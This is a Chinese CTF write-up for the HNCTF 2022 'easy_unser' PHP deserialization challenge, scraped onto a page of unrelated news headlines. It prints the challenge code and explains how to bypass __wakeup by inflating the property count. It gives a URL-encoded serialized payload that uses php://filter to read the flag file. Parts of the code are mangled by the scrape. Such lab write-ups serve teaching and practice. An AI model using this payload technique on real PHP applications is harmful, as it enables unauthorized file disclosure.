[HNCTF 2022 WEEK2] 每日速看
2023-05-05 22:21:37 博客园


(资料图片仅供参考)

easy_unser

want = $want;        else $this->want = $this->todonothing;    }    function __wakeup(){        $About_me = "When the object is unserialized,I will be called";        $but = "I can CHANGE you";        $this-> want = $but;        echo "C1ybaby!";            }    function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    }}    class unserializeorder{        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
";        function __sleep(){            $About_me = "When the object is serialized,I will be called";            echo "We Come To HNCTF,Enjoy the ser14l1zti0n 
";        }        function __toString(){            $About_me = "When the object is used as a string,I will be called";            return $this->CORE;        }    }        $obj = new unserializeorder();    echo $obj;    $obj = serialize($obj);        if (isset($_GET["ywant"]))    {        $ywant = @unserialize(@$_GET["ywant"]);        echo $ywant;    }?>人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n

首先看代码可知,flag在f14g.php中,所以我们只要找到能够利用的点就可以了。

往上看可以看到body类中highlight_file()可以进行利用,所以说我们需要让want为我们想要的f14g.php就可以了。

function __destruct(){        $About_me = "I"m the final function,when the object is destroyed,I will be called";        echo "So,let me see if you can get what you want\n";        if($this->todonothing === $this->want)            die("鲍勃,别傻愣着!\n");        if($this->want == "I can CHANGE you")            die("You are not you....");        if($this->want == "f14g.php" OR is_file($this->want)){            die("You want my heart?No way!\n");        }else{            echo "You got it!";            highlight_file($this->want);            }    }

但是这边过滤的有点严,若是want=f14g.php,或者说是is_file()中的文件存在的话就会返回"So,let me see if you can get what you want\n";

所以我们不能直接让want=f14g.php,这里可以用php://filter伪协议来回显f14g.php文件。

构造如下:

";    }$a=new body();echo urlencode(serialize($a));?>

payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}

这里注意还需要绕过__wakeup魔术方法,所以%3A %3A中间原本为1,现在为2。

热门推荐

文章排行

  1. 2023-05-05[HNCTF 2022 WEEK2] 每日速看
  2. 2023-05-05全球消息!河北小伙婚礼现场收到立功喜报,村民称这份“贺礼”太让人羡慕!
  3. 2023-05-05网球抢七规则_网球抢七 头条
  4. 2023-05-05dnf狐狸头是第几期天空 dnf狐狸头是第几套天空-全球球精选
  5. 2023-05-05溢价70%!411万/亩!吉安一地55亩地块2.26亿成交!|全球观察
  6. 2023-05-05万科企业(02202)4月合同销售额334.7亿元
  7. 2023-05-05曝阿森纳有意克罗地亚国脚苏塔洛 球员标价预计在1800万英镑左右_世界最新
  8. 2023-05-05世界观焦点:“瓦格纳”集团创始人威胁下周撤兵,站在尸体前咒骂俄防长绍伊古等高层
  9. 2023-05-05别只会吃米饭和面条了!煮饭时加点料,营养加倍,远离肥胖和“三高” 独家
  10. 2023-05-05星展银行“跨境理财通”北向通业务正式上线
  11. 2023-05-05世界讯息:伟诚科技2022年净利55.67万同比下滑73.33% 国内移动业务收缩
  12. 2023-05-05库里:我并不觉得湖人累了 他们G3会卷土重来的_今热点
  13. 2023-05-05当前观点:外交部:美方正在把台湾变成“火药桶” 遭殃的是广大台湾同胞
  14. 2023-05-05如何用ps做简单的像素画(使用ps是如何画简单的像素画) 焦点热文
  15. 2023-05-05天天最资讯丨东方幻想乡动漫第一季全集
  16. 2023-05-05塞尔维亚首都贝尔格莱德发生严重枪击案,中国驻塞使馆发布紧急提醒-世界视点
  17. 2023-05-05【报资讯】食品安全无小事,蜜雪冰城又爆出饮品中喝到了大蟑螂
  18. 2023-05-05天天热推荐:亚香股份:截至2023年4月28日公司股东总数5459户
  19. 2023-05-05星球大战绝地幸存者扇尾拉鱼在哪里钓
  20. 2023-05-05pt990铂金回收价格今日多少钱一克(2023年05月05日)_环球速看料

Copyright   2015-2022 人人金属网 版权所有  备案号: 粤ICP备18023326号-36   联系邮箱:8557298@qq.com